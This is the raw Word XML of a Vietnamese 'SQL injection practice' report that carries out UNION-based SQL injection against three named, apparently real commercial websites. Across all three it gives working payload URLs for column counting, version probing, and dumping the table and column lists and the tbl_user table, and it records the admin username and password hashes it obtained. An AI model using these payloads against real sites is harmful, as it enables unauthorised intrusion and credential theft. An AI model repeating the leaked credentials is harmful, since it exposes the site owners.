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222B40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Thực hành SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021ACB8">
      <w:p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Web 1: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"https://www.thanhnha.com"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36B7583A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Tìm trang web bị lỗi SQL INJECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A0A39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"https://www.thanhnha.com/?php=product_detail&amp;id=288"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https://www.thanhnha.com/?php=product_detail&amp;id=288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0FE96B60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1610" cy="2778760"/>
            <wp:effectExtent l="0" t="0" r="1143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CEB2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số cột của table mà SQL truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC683E7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https://www.thanhnha.com/?php=product_detail&amp;id=288 order by 17--</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E8C68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9555"/>
            <wp:effectExtent l="0" t="0" r="88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DD6F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 xml:space="preserve">Web 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"https://www.thanhnha.com"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 xml:space="preserve"> có 17 cột.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20B01D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cột bị lỗi mà ta có thể khai thác được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39A95E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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FD206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1610" cy="2784475"/>
            <wp:effectExtent l="0" t="0" r="1143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2788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một số thông tin của database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C219A6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1610" cy="2792730"/>
            <wp:effectExtent l="0" t="0" r="1143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9F5F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-&gt; Đang ở phiên bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.6.19-MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9F569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bảng trong database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D0B759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1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B15B1F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4150" cy="278130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2AD9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cột trong table (tbl_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755218E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1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=CHAR(116,98,108,95,112,114,111,100,117,99,116)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FE623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4150" cy="2787015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CE72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Lấy dữ liệu trong bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58753E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1,2,unhex(hex(group_concat(id,0x2f))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_product --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A1CF8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4150" cy="2784475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51DC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Xác định name và parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C674C6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1,2,unhex(hex(group_concat(id,0x2f,name,0x2f,parent))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_product --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C58EB2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92730"/>
            <wp:effectExtent l="0" t="0" r="889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25FB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Liệt kê các cột trong table (tbl_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCFC48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https://www.thanhnha.com/?php=product_detail&amp;id=-288 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=CHAR(116,98,108,95,117,115,101,114)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BCEA3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701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7183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Lấy dữ liệu trong bảng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(tbl_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B00502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https://www.thanhnha.com/?php=product_detail&amp;id=-288 UNION SELECT 1,2,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_user --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD0032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4150" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="889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954B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Xác định username và password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6688DB07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Username: admincp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D33A80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https://www.thanhnha.com/?php=product_detail&amp;id=-288 UNION SELECT 1,2,unhex(hex(group_concat(uid))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_user --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE610AD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Decrypt password: 31b5d7b1a473763500b9b0d66e1a63c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A86D5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1300"/>
            <wp:effectExtent l="0" t="0" r="889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2008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7015"/>
            <wp:effectExtent l="0" t="0" r="889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E9A3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428457A9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 xml:space="preserve">Web 2: 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"https://ngoidongnai.com"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29E49128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Tìm trang web bị lỗi SQL INJECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EEFFF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"https://ngoidongnai.com/?php=product_detail&amp;id=331"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https://ngoidongnai.com/?php=product_detail&amp;id=331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45DA8A33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58435" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="1460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A931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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số cột của table mà SQL truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA8DC7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https://ngoidongnai.com/?php=product_detail&amp;id=331 order by 18--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AD8CE">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2787015"/>
            <wp:effectExtent l="0" t="0" r="889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DA90"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Web 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"https://ngoidongnai.com"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 xml:space="preserve"> có 18 cột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782839DE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cột bị lỗi mà ta có thể khai thác được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D86B35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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EA5C7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81300"/>
            <wp:effectExtent l="0" t="0" r="889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0B41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một số thông tin của database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47407C4E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1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F0B713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1610" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="1143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5855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-&gt; Đang ở phiên bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.6.19-MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C016020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bảng trong database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3048B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1,2,3,4,5,6,7,unhex(hex(group_concat(table_name))),9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B8F84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74310" cy="2802255"/>
            <wp:effectExtent l="0" t="0" r="139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8E0A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cột trong table (tbl_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958BF4F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1,2,3,4,5,6,7,unhex(hex(group_concat(column_name))),9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=CHAR(116,98,108,95,117,115,101,114)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD21DF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87015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F0CB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Lấy dữ liệu trong bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5AB31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1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),9,10,11,12,13,14,15,16,17,18 from tbl_user --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E7A55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58435" cy="2792730"/>
            <wp:effectExtent l="0" t="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EBE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Xác định username và password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1208EBCF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Username: admincp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84BA16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https://ngoidongnai.com/?php=product_detail&amp;id=-331 UNION SELECT 1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),9,10,11,12,13,14,15,16,17,18 from tbl_user --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A1C4C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Decrypt password: 31b5d7b1a473763500b9b0d66e1a63c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D414AD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92730"/>
            <wp:effectExtent l="0" t="0" r="889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6EB5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9555"/>
            <wp:effectExtent l="0" t="0" r="88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9A70">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1885B9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 xml:space="preserve">Web 3: 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"https://www.mayinchuyennhiet.vn"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6CEE7E46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Tìm trang web bị lỗi SQL INJECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123B14E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instrText xml:space="preserve"> HYPERLINK "https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=306" </w:instrTex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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=306</w:t>
      </w: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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB6550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1610" cy="2792730"/>
            <wp:effectExtent l="0" t="0" r="1143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08E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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số cột của table mà SQL truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC358D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=306 order by 26--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9945A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2787015"/>
            <wp:effectExtent l="0" t="0" r="889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38BD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
          <w:woUserID w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab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Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ttps://www.mayinchuyennhiet.vn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có 26 cột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC590D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cột bị lỗi mà ta có thể khai thác được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDF967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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=-306 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D036A4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84475"/>
            <wp:effectExtent l="0" t="0" r="889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700F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Kiểm tra một số thông tin của database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE6D1A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4150" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="889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021A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-&gt; Đang ở phiên bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.6.19-MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEF502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bảng trong database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F101837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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=-306 UNION SELECT 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7C54F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84475"/>
            <wp:effectExtent l="0" t="0" r="889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2CBD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Liệt kê các cột trong table (tbl_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F7B98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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=-306 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305AD72A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92730"/>
            <wp:effectExtent l="0" t="0" r="889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0CE4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Lấy dữ liệu trong bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427B8571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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=-306 UNION SELECT 1,2,3,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from tbl_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C774D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2789555"/>
            <wp:effectExtent l="0" t="0" r="889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07BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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 w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác định username và password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34AAC4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:leftChars="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Username: admincp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A99F2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https://www.mayinchuyennhiet.vn/?php=product_detail&amp;id=-306 UNION SELECT 1,2,3,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from tbl_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A3F6D"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/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Decrypt password: 0a4f59342d128ab612449a75ba121dc0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4967B0"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58435" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="14605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FB3E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:lef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2789555"/>
            <wp:effectExtent l="0" t="0" r="8890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DFBA5A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</w:p>
    <w:p w14:paraId="58BBE2AB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</w:p>
    <w:p w14:paraId="1C916199"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 w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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76F93D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A676F93D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AEEA2689"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEEA268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4E260A3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C4E260A3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E4C3CC42"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E4C3CC4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08C2FFF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="208C2FF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11164D"/>
    <w:rsid w:val="7B11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2025-01-20T15:14:00Z</dcterms:created>
  <dc:creator>Huynh Minh Man</dc:creator>
  <cp:lastModifiedBy>Huynh Minh Man</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-20T16:53:58Z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EFDFC4CC0E1C4121BAA3E89DA8BD3438_11</vt:lpwstr>
  </property>
</Properties>
</file>